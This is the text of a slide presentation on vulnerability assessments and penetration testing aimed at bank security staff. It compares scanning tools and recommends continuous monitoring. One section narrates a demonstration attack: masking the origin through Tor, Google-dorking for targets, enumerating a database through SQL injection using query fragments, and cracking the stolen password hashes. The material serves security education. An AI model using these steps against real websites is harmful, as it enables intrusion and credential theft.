Vulnerability Assessment and Penetration Testing

Vulnerability Assessment and Penetration Testing Presenters: Bruce Upton CISSP, CISA, C EH bruce.upton@protectmybank.com Jerry McClurg CISSP, CISA, C EH jerry.mcclurg@protectmybank.com

Agenda and Overview: Vulnerability Scanning and Identification: What is a vulnerability assessment? Internal versus external scanning an testing How are vulnerability tests different from penetration tests? Vulnerability scanning tools and reporting Additional considerations: Understanding vulnerability assessments and penetration tests are only valid for a short period of time Continuous monitoring Management oversight

What s the Difference?: Vulnerability Identification versus Penetration Testing: Vulnerability Assessment: Generally, a vulnerability assessment is an automated scan of network resources resulting in a detailed report of security vulnerabilities. Penetration Test: Penetration testing incorporates vulnerability scanning and identification, but additional effort is applied in an attempt to exploit identified vulnerabilities. Vulnerability assessments and penetration tests are both good security due-diligence.

What s the Difference?: Vulnerability Identification versus Penetration Testing: A vulnerability assessment may identify the following security weaknesses: Users have local administrator rights on their Windows 7 computers. Users can access most websites on the Internet. Users have the authority to run programs from within Internet Explorer. A penetration test would identify the security weaknesses, but go quite a bit further: Users have local administrator rights on their Windows 7 computers. Users can access most websites on the Internet. Users have the authority to run programs from within Internet Explorer. A user was convinced to visit a phishing website The user ran a connection test application Symantec Antivirus did not detect the connection test application Unauthorized remote access was obtained into the network.

Internal versus External: Generally speaking, there are two types of assessments: Internal Assessment: The vulnerability scan or penetration test is performed from inside the organization. The engineer(s) either physically visit the organization or gain secure remote access. The test simulates an attack from the inside-out. This overall approach will: Identify internal devices (enumeration) Identify services and footprint internal devices Identify internal security weaknesses in the following, at a minimum, categories: Patch management, network segregation, network access controls, data security, intrusion detection systems (IDS) testing, SCADA (if in scope), key management and crypto security (if in scope); Password practices and overall PC, server, and network device security due-diligence, etc.

Internal versus External: Generally speaking, there are two types of assessments: External Assessment: The vulnerability scan or penetration test is performed from outside the organization. The engineer(s) test the organizations infrastructure using an outside-in approach. This overall approach will: Identify external devices (enumeration) Identify services and foot print external devices Identify external security weaknesses in the following, at a minimum, categories: Firewall security, remote access portals, database management system (DBMS) security, web application security, intrusion detection systems (IDS) and intrusion prevention services (IPS) testing.

Testing Quality: Testing quality and effectiveness: The overall effectiveness of your assessment is generally based on three main factors: The effectiveness and thoroughness of the scanning toolset(s) The overall quality and talent of the internal and/or external security firm or personnel Certifications, experience, etc. How effectively the security firm and internal departments work together Free flow of information between the firm and key departments is central to the success of an assessment

Toolsets: Vulnerability scanning toolsets: The effectiveness and thoroughness of a vulnerability assessment is heavily based on toolsets. Some effective toolsets include: Qualys Internal and external vulnerability scanning Low false-positive rates Pay per IP model Rapid7 Internal and external vulnerability scanning Low false-positive rates Pay per IP model Nessus Internal and external vulnerability scanning Effective pricing model In our experience, Nessus tends to have a higher false-positive rate Nexpose Internal and external vulnerability scanning Community edition available Low false-positive rates

Toolsets: Vulnerability scanning toolsets: Qualys Enterprise scanning tool with a number of compliance modules

Toolsets: Vulnerability scanning toolsets: Qualys Reporting, remediation tracking and a large knowledgebase:

Toolsets: Vulnerability scanning toolsets: Qualys Advantages: Low false-positive rates Detailed reporting Remediation tracking Most vulnerabilities identified will have resolution strategies Disadvantages All scan data is stored in the cloud at Qualys Pay-per-IP model makes scanning large IP blocks very expensive

Toolsets: Vulnerability scanning toolsets: Nexpose Enterprise-class with a low false-positive rate, strong reporting and numerous compliance templates

Toolsets: Vulnerability scanning toolsets: Nexpose Extensive compliance and simulation testing:

Toolsets: Vulnerability scanning toolsets: Nexpose Advantages: Low false-positive rates Detailed reporting Many compliance and simulation scan templates Most vulnerabilities identified will have resolution strategies It s not a pay-per-ip scanning solution, potentially making it a good fit for internal scanning and testing Disadvantages Like most vulnerability scanners it generates a lot of network traffic. It could cause network latency or denial-of-service if it s not configured properly. Resource intensive It s pricy at about $10,000 to $15,000 depending on the scope and services needed

Tool Availability: Overall, We re seeing two concerning trends today: The availability of hacking tools is unprecedented. Free tools to: Exploit websites Identify vulnerabilities Perform data mining Hacking wireless networks, etc. Tools available to hide your tracks and/or become virtually invisible are at an all time high. Examples include: VPN solutions that don t keep long-term logs ProXPN - pro TOR Tor is free software and an open network that helps you defend against traffic analysis, a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security torproject.org The world has learned just how effective TOR is: the Snowden leaks demonstrated the NSA has not broken TOR (only circumvented it)

Why are we concerned? The following attack was performed using publicly-available software and our origin was successfully masked: First step, go dark (anonymous) to obscure where your Internet traffic is originating from. In our case, it looks like we re coming from Germany:

Why are we concerned? The following attack was performed using publicly-available software and our origin was successfully masked: An outside-in approach was used and it starting with Google hacking: The hacker identifies a target (neither of these websites were used in our demonstration):

Why are we concerned? The following attack was performed using publically-available software and our origin was successfully masked: An escape string is used to look for an SQL-injection vulnerability: Inserting the string generated an error:

Why are we concerned? The error message tells us it s likely vulnerable to an SQLinjection attack Further testing reveals it is, and the following information is initially obtained via SQL-injection strings:

Why are we concerned? SQL-injection commands are further used to extract information: Database table names are obtained using an SQL-injection string: Count(table_name) of information_schema.tables where table_schema=0x67656d656469615f7073 is 27 Note the users table

Why are we concerned? SQL-injection commands are further used to extract information: Table field names are extracted from the users table: Count(column_name) of information_schema.columns where table_schema=0x67656d656469615f7073 and table_name=0x7573657273 is 13

Why are we concerned? SQL-injection commands are further used to extract information: Username and password field data are extracted from the users table: Count(*) of XXXXXXXX_ps.users is 4

Why are we concerned? Data extraction: Testing revealed the passwords are encrypted How are they encrypted? How do we find out? Is there a way to decrypt them?

Why are we concerned? Password decryption: There are a number of off-line tools such as Hashcat and L0phtCrack that can be used to launch brute-force or dictionary attacks. A number of websites specialize in dictionary lookups Cloudcracker.com Crackstation.net md5decrypter.co.uk

Why are we concerned? Password decryption: We were able to successfully identify how the passwords were encrypted, and we were able to decrypt two of three:

Why are we concerned? Malicious intent: We stopped testing at this point, but unfortunately, most blackhat hackers would not. Web anonymity is a great way to encourage Internet privacy. However, the tools to protect our Internet privacy are being used maliciously by hackers to cover their tracks.

Additional Considerations Vulnerability and penetration testing frequency: Vulnerability assessments and penetration tests are only valid for a short period of time For example, the second Tuesday of every month is known as Patch Tuesday. The following Wednesday is known as Exploit Wednesday. To address these security gaps-in-time, continuous monitoring systems can be implemented: Bit9 Parity Tripwire FireMon

Additional Considerations Assess and Identify All Ports, Programs, and Services : The programs we have discussed should identify all active ports/services What About Software Programs or Inactive Processes? Tools that Identify All Installed Software Microsoft Assessment and Planning (MAP) Toolkit Emco Network Software Scanner Try to use at least two programs to check against each other

Additional Considerations

Additional Considerations Assessment Plan: Start from the External View View Information from a Hacker Viewpoint Domain and DNS Registration Gateway Routers, IDS, Firewalls Email and DMZ Devices Internal Network Internal/Rogue User Access Vendor/Visitor Access Remote Access

Additional Considerations Document and Track Open Issues: Easy to Lose Track Without Tracking and Follow-up Schedule Regular Progress Updates and Report to Management

Summary and Take-Aways: Document and Follow an Assessment Plan Maintain Multiple Software Toolsets Stay Engaged Technology Security is a Moving Target

Questions?